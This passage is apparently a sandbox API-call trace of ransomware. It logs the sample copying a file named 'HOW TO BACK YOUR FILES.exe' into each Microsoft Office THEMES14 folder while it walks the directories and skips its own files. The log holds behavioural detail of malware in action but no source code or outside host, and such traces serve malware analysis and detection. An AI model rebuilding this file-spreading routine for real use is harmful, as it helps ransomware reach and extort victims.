Files\\Common Files\\Microsoft Shared\\THEMES14\\EVRGREEN" [0075.377] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0075.377] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EVRGREEN\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\evrgreen\\how to back your files.exe"), bFailIfExists=1) returned 1 [0075.382] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0075.382] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EVRGREEN\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x51fe2db0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x5e6fa740, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5e6fa740, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccda8 [0075.382] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0075.382] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0075.382] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EDGE", iMaxLength=260 | out: lpString1="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EDGE") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EDGE" [0075.382] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f0628 | out: hHeap=0x2b0000) returned 1 [0075.382] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d26a0 | out: hHeap=0x2b0000) returned 1 [0075.382] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EDGE") returned 60 [0075.382] lstrcatW (in: lpString1="", lpString2="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EDGE" | out: lpString1="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EDGE") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EDGE" [0075.382] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0075.382] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EDGE\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\edge\\how to back your files.exe"), bFailIfExists=1) returned 1 [0075.386] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0075.386] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EDGE\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x51f70990, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x5e6fa740, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5e6fa740, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccda8 [0075.386] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0075.386] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0075.387] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECLIPSE", iMaxLength=260 | out: lpString1="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECLIPSE") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECLIPSE" [0075.387] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f0738 | out: hHeap=0x2b0000) returned 1 [0075.387] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2680 | out: hHeap=0x2b0000) returned 1 [0075.387] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECLIPSE") returned 63 [0075.387] lstrcatW (in: lpString1="", lpString2="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECLIPSE" | out: lpString1="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECLIPSE") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECLIPSE" [0075.387] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0075.387] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECLIPSE\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\eclipse\\how to back your files.exe"), bFailIfExists=1) returned 1 [0075.391] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0075.391] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECLIPSE\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x51e3fe90, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x5e6fa740, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5e6fa740, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccda8 [0075.391] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0075.391] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0075.392] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECHO", iMaxLength=260 | out: lpString1="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECHO") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECHO" [0075.392] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f05a0 | out: hHeap=0x2b0000) returned 1 [0075.392] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2660 | out: hHeap=0x2b0000) returned 1 [0075.392] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECHO") returned 60 [0075.392] lstrcatW (in: lpString1="", lpString2="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECHO" | out: lpString1="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECHO") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECHO" [0075.392] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0075.392] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECHO\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\echo\\how to back your files.exe"), bFailIfExists=1) returned 1 [0075.395] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0075.395] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECHO\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5a6f8e30, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x5e7208a0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5e7208a0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccda8 [0075.395] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0075.395] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0075.396] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\DEEPBLUE", iMaxLength=260 | out: lpString1="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\DEEPBLUE") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\DEEPBLUE" [0075.396] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e9ac0 | out: hHeap=0x2b0000) returned 1 [0075.396] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2640 | out: hHeap=0x2b0000) returned 1 [0075.396] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\DEEPBLUE") returned 64 [0075.396] lstrcatW (in: lpString1="", lpString2="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\DEEPBLUE" | out: lpString1="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\DEEPBLUE") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\DEEPBLUE" [0075.396] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0075.396] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\DEEPBLUE\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\deepblue\\how to back your files.exe"), bFailIfExists=1) returned 1 [0075.403] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0075.403] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\DEEPBLUE\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5a6f8e30, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x5e7208a0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5e7208a0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccda8 [0075.403] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0075.403] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0075.403] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CONCRETE", iMaxLength=260 | out: lpString1="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CONCRETE") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CONCRETE" [0075.403] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e9b50 | out: hHeap=0x2b0000) returned 1 [0075.403] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2500 | out: hHeap=0x2b0000) returned 1 [0075.403] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CONCRETE") returned 64 [0075.403] lstrcatW (in: lpString1="", lpString2="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CONCRETE" | out: lpString1="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CONCRETE") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CONCRETE" [0075.403] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0075.403] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CONCRETE\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\concrete\\how to back your files.exe"), bFailIfExists=1) returned 1 [0075.409] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0075.409] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CONCRETE\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x51cc30d0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x5e746a00, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5e746a00, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccda8 [0075.409] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0075.409] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0075.410] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\COMPASS", iMaxLength=260 | out: lpString1="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\COMPASS") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\COMPASS" [0075.410] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f0490 | out: hHeap=0x2b0000) returned 1 [0075.410] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d24e0 | out: hHeap=0x2b0000) returned 1 [0075.410] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\COMPASS") returned 63 [0075.410] lstrcatW (in: lpString1="", lpString2="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\COMPASS" | out: lpString1="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\COMPASS") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\COMPASS" [0075.410] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0075.410] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\COMPASS\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\compass\\how to back your files.exe"), bFailIfExists=1) returned 1 [0075.413] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0075.413] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\COMPASS\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x51cc30d0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x5e746a00, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5e746a00, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccda8 [0075.413] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0075.413] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0075.414] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CASCADE", iMaxLength=260 | out: lpString1="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CASCADE") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CASCADE" [0075.414] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f0408 | out: hHeap=0x2b0000) returned 1 [0075.414] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d24c0 | out: hHeap=0x2b0000) returned 1 [0075.414] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CASCADE") returned 63 [0075.414] lstrcatW (in: lpString1="", lpString2="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CASCADE" | out: lpString1="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CASCADE") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CASCADE" [0075.414] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0075.414] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CASCADE\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\cascade\\how to back your files.exe"), bFailIfExists=1) returned 1 [0075.423] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0075.423] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CASCADE\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x51c50cb0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x5e746a00, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5e746a00, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccda8 [0075.423] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0075.423] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0075.423] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CAPSULES", iMaxLength=260 | out: lpString1="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CAPSULES") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CAPSULES" [0075.423] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e9be0 | out: hHeap=0x2b0000) returned 1 [0075.423] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d22e0 | out: hHeap=0x2b0000) returned 1 [0075.423] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CAPSULES") returned 64 [0075.423] lstrcatW (in: lpString1="", lpString2="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CAPSULES" | out: lpString1="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CAPSULES") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CAPSULES" [0075.423] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0075.424] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CAPSULES\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\capsules\\how to back your files.exe"), bFailIfExists=1) returned 1 [0075.437] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0075.437] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CAPSULES\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x51c2ab50, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x5e76cb60, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5e76cb60, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd0e8 [0075.437] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0075.437] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0075.437] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CANYON", iMaxLength=260 | out: lpString1="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CANYON") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CANYON" [0075.437] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f01e8 | out: hHeap=0x2b0000) returned 1 [0075.437] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2340 | out: hHeap=0x2b0000) returned 1 [0075.437] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CANYON") returned 62 [0075.437] lstrcatW (in: lpString1="", lpString2="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CANYON" | out: lpString1="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CANYON") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CANYON" [0075.437] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0075.437] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CANYON\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\canyon\\how to back your files.exe"), bFailIfExists=1) returned 1 [0075.441] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0075.441] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CANYON\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x51c2ab50, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x5e792cc0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5e792cc0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd0e8 [0075.441] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0075.441] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0075.442] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BREEZE", iMaxLength=260 | out: lpString1="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BREEZE") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BREEZE" [0075.442] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f0160 | out: hHeap=0x2b0000) returned 1 [0075.442] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2480 | out: hHeap=0x2b0000) returned 1 [0075.442] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BREEZE") returned 62 [0075.442] lstrcatW (in: lpString1="", lpString2="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BREEZE" | out: lpString1="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BREEZE") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BREEZE" [0075.442] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0075.442] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BREEZE\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\breeze\\how to back your files.exe"), bFailIfExists=1) returned 1 [0075.445] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0075.445] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BREEZE\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x51a61ad0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x5e792cc0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5e792cc0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd0e8 [0075.446] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0075.446] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0075.446] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BOLDSTRI", iMaxLength=260 | out: lpString1="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BOLDSTRI") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BOLDSTRI" [0075.446] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e9c70 | out: hHeap=0x2b0000) returned 1 [0075.446] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2460 | out: hHeap=0x2b0000) returned 1 [0075.446] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BOLDSTRI") returned 64 [0075.446] lstrcatW (in: lpString1="", lpString2="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BOLDSTRI" | out: lpString1="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BOLDSTRI") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BOLDSTRI" [0075.446] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0075.446] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BOLDSTRI\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\boldstri\\how to back your files.exe"), bFailIfExists=1) returned 1 [0075.451] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0075.451] FindFirstFileW (in: 